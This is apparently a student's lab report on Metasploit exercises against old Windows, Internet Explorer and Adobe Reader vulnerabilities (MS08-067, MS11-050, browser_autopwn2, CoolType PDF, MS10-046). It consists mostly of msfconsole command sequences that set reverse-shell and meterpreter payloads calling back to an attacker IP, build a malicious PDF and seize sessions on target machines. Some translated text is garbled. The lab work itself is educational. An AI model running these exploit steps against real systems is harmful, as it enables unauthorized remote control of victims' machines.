Exp5: MSF Basic Application
1. Answers to basic questions
(1) Explain what is exploit , payload , encode in your own words.
Exploit: Set up a pipeline that is equivalent to using a vulnerability to secretly open, and smoothly transmit the prepared Trojan horse virus to the target machine.
Payload: Simply put, the virus code is packaged into an executable file, or packaged into a specified type, and then transmitted through the pipeline to start to control the target machine for us.
encode: Encoding for the payload is to package and dress it up and change the code characteristics of the payload, but it does not change the characteristics of the payload for us, but it can process the payload.
2. The practical process
- 1. Windows Service Penetration Attack - MS08-067 Security Vulnerability
- Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp//tcp reverse connection
msf exploit(ms08_067_netapi) > set LHOST 192.168.43.161//attack machine ip
msf exploit(ms08_067_netapi) > set LPORT 5213//attack port
msf exploit(ms08_067_netapi) > set RHOST 192.168.43.161//target machine ip, the specific vulnerability port has been fixed
msf exploit(ms08_067_netapi) > set target 0//automatically select the target system type, the matching degree is high
msf exploit(ms08_067_netapi) > exploit//attack
At this time, you need to close the firewall of the target machine, otherwise it will
ConnectionTimeOutfail;
Result after successful attack:
2. Browser Penetration Attack - MS11-050
- Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:
msf > use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_cobjectelement) > set payload
windows/meterpreter/reverse_http//http reverse connection
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.43.161//attack machine ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5213//fixed attack port
msf exploit(ms11_050_cobjectelement) > set URIPATH 5213lzm//uniform resource identifier path setting
msf exploit(ms11_050_cobjectelement) > exploit
- If the test fails, there will always be an IE browser error. I think the problem is that the browser version is wrong, which is not suitable for the vulnerability. If so, then change the vulnerability. The following uses an automatic selection method according to the browser version. methods of exploiting vulnerabilities
- ** Implement the browser_autopwn module**
Now enter the msfconsole in the attack machine, and then enter
use auxiliary/server/browser_autopwn2
set SRVHOST 192.168.43.161
set URIPATH auto
show options
- Start the attack, you can see that msf is constantly trying different payloads
The attempt is successful, the accessible URL is output
http://192.168.43.161:8080/autoand the server is started;
After entering the URL on the target machine browser, the browser jumps
http://192.168.43.161:8080/auto/FaOGspto
Looking back at the kali machine, I found that the connection was successful, and I entered the
session -i 2acquisition dialogue. At this time, the control of the target machine has been obtained.
- ** Implement the browser_autopwn module**
3. Infiltration attack against Adobe Reader software - adobe_toolbutton
- Enter msfconsole on the attack machine kali to enter the console, and enter the following commands in sequence:
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload
windows/meterpreter/reverse_tcp//tcp reverse connection
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.161//attack machine ip
msf exploit(adobe_cooltype_sing) > set LPORT 5213//attack port
msf exploit(adobe_cooltype_sing) > set FILENAME 5213lzm.pdf//set the name of the generated pdf file
msf exploit(adobe_cooltype_sing) > exploit//attack
Copy the generated pdf file to the target machine.
Enter back on kali to exit the current module, enter the monitoring module, and enter the following command:
msf > use exploit/multi/handler//Enter the monitoring module
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp//tcp reverse connection
msf exploit(handler) > set LHOST 192.168.43.161//attack machine ip
msf exploit(handler) > set LPORT 5213//fixed attack port
msf exploit(handler) > exploit
- Open the 5213lzm.pdf file on the target drone:
- The attack aircraft showed that the attack was successful:
- 4. Shortcut Icon Vulnerability - MS10-046
- Enter msfconsole in the attack machine kali to enter the console, and enter the following commands in turn:
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.43.48//Attack machine ip
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp//tcp reverse connection
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.43.48//Attack machine ip
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit//Attack
- At this point, a directory of the attacker's IP pops up with a "shortcut" icon:
- For a session that has been established,
sessionsview it through the command, and selectsessions -i 1it to gain control of the target machine.
(PS) The time span of this test is a bit large, and I couldn’t finish it coherently. The fourth task was done after the end of ciscn. At this time, the kali machine has been tossed down, so I took the virtual test of others. Machine, continue to finish, the IP here is not the previous one.
- Enter msfconsole in the attack machine kali to enter the console, and enter the following commands in turn:
3. Summary and experience of practice
This test gave me the deepest impression on the power of msf. The use of msf can really help a lot in penetration testing or attack-oriented behaviors. A pair of research glasses are snooping on your laptop.